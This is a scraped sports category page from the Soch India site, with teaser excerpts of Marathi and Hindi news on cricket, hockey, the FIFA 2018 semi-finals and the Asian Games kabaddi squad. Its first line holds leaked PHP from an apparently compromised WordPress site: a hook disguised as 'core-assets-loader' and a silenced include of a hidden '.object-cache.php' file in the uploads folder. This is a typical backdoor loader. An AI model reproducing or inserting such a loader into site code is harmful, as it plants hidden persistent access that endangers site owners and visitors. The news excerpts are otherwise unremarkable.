add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); खेल – SOCH INDIA
Menu

कुलदीप यादव हा डावखुरा फिरकी गोलंदाज अत्यंत उपयुक्त असून इंग्लंडविरूद्धच्या पाच कसोटी सामन्यांमध्ये त्याचा नक्की फायदा होईल अशा शब्दांमध्ये मास्टर ब्लास्टर सचिन तेंडुलकरने कुलदीपला पाठिंबा दर्शवला आहे. ज्यो रूटसह इंग्लंडच्या अन्य फलंदाजांना नियंत्रणात ठेवण्यासाठी कुलदीप कामाला येईल असा विश्वास सचिननं व्यक्त केला आहे. इंग्लंडच्या समोर एकदिवसीय सामन्यांत खेळताना कुलदीपनं...

Read More

लंडनमध्ये पार पडत असलेल्या महिला हॉकी विश्वचषकादरम्यान काही दिवसांपूर्वी आंतरराष्ट्रीय हॉकी महासंघाने घातलेला गोंधळ चांगलाच चर्चेत आला होता. महिला कर्णधारांच्या फोटोशूटदरम्यान भारताच्या तिरंग्यावर अशोकचक्रच गायब करण्यात आलं होतं. या फोटोशूटचे फोटो सोशल मीडियावर व्हायरल झाल्यानंतर भारतीय क्रीडाप्रेमींनी चांगलीच नाराजी व्यक्त केली. थेम्स नदीच्या किनाऱ्यावर या विश्वचषकातील कर्णधारांचं फोटोशूट करण्यात...

Read More

इंग्लंडचा माजी फिरकी गोलंदाज ग्रॅमी स्वानचा दावा चेंडू स्विंग करण्यात इंग्लिश गोलंदाज अपयशी ठरले तर कसोटी मालिकेत भारतीय संघ आक्रमकपणे पुनरागमन करू शकेल, असा दावा इंग्लंडचा माजी ऑफ-स्पिनर ग्रॅमी स्वानने केला आहे. एकदिवसीय मालिकेत भारताचा २-१ असा पराभव केल्यामुळे पाच सामन्यांच्या कसोटी मालिकेकडे वाटचाल करताना इंग्लंडचा आत्मविश्वास दुणावला आहे....

Read More

नुकत्याच झालेल्या इंग्लंडविरुद्धच्या एकदिवसीय मालिकेत भारताला पराभवाचा सामना करावा लागला. या पराभवाचे खापर माजी कर्णधार सौरव गांगुली याने संघ व्यवस्थापनावर फोडले असतानाच आता माजी क्रिकेटपटू व्ही व्ही एस लक्ष्मण यानेही संघाबाबतच्या काही विशिष्ट निर्णयांवर प्रश्न उपस्थित केले आहेत. निर्णायक सामन्यात लोकेश राहुलला संघात स्थान देण्यात आले नाही. युवा आणि...

Read More

आंतरराष्ट्रीय क्रिकेटमध्ये पदार्पण करणाऱ्या अर्जुन तेंडूलकरने पहिल्याच सामन्यात आपले वडील मास्टर ब्लास्टर सचिन तेंडुलकर याच्या एका विक्रमाशी बरोबरी केली आहे. सध्या अर्जुन तेंडूलकर भारताच्या १९ वर्षाखालील संघाकडून श्रीलंका दौऱ्यावर आहे. या दौऱ्यातील दोन ४ दिवसीय कसोटी सामन्यासाठी त्याची संघात निवड झालेली होती. यानंतर आज पहिल्या डावात अर्जुनला शून्यावर बाद...

Read More

तिसऱ्या आणि अखेरच्या वन-डे सामन्यात भारताला पराभवाला सामोरं जावं लागलं आहे. ३ वन-डे सामन्यांची मालिकाही इंग्लंडने २-१ अशी जिंकली. मात्र पराभवानंतरही भारतीय संघाचा कर्णधार विराट कोहलीच्या नावावर आणखी एक विक्रमाची नोंद करण्यात आलेली आहे. कर्णधार या नात्याने सर्वात जलद ३ हजार धावा करणारा कोहली पहिला फलंदाज ठरला आहे. डेव्हिड...

Read More

विंडीजचा स्फोटक फलंदाज ख्रिस गेल हा आपल्या तुफानी फलंदाजीसाठी आणि टी२० क्रिकेटमधील आपल्या विक्रमांसाठी कायम चर्चेत असतो. पण नुकतेच त्याने आपल्या क्षेत्ररक्षणामुळे सर्व क्रीडारसिकांचे लक्ष वेधून घेतले आहे. ग्लोबल कॅनडा लीगमध्ये अंतिम सामन्यात व्हॅन्कुव्हर नाईट्स या संघाकडून खेळताना वेस्ट इंडिज बी संघाविरुद्ध पहिल्या स्लिपमध्ये त्याने झेल घेतला. त्याने एका...

Read More

इंग्लैंड को सेमीफाइनल में एक्सट्रा टाइम में हराने के बाद क्रोएशिया के कोच ज्लाटको डालिच ने कहा है कि फ्रांस के खिलाफ वर्ल्ड कप फाइनल में थकान कोई मसला नहीं होगा. क्रोएशिया ने एक गोल से पिछड़ने के बाद वापसी करते हुए 2 . 1 से जीत दर्ज की....

Read More

बेल्जियम की टीम फीफा 2018 विश्व कप का पहला सेमीफाइनल आज सेंट पीटर्सबर्ग स्टेडियम में फ्रांस के साथ खेलेगी. आज ये दोनों यूरोपीय टीम आमने-सामने होंगी. बेल्जियम 32 साल के लंबे इंतजार के बाद अंतिम-4 में पहुंचने में कामयाब हुआ है लेकिन फ्रांस जैसी मजबूत टीम को हराना उसके...

Read More

ऑगस्ट महिन्यात इंडोनेशियाच्या जकार्तामध्ये होणाऱ्या आशियाई खेळांसाठी भारताच्या कबड्डी संघाची घोषणा करण्यात आलेली आहे. महाराष्ट्राच्या रिशांक देवाडीगा आणि गिरीश एर्नाक या खेळाडूंची संघात निवड झालेली आहे. कबड्डीत सध्या भारत आंतरराष्ट्रीय पातळीवर आपलं वर्चस्व राखून आहे, मात्र इराण आशियाई खेळांमध्ये भारताला कडवी टक्कर देऊ शकतो असं मत रिशांक देवाडीगाने व्यक्त...

Read More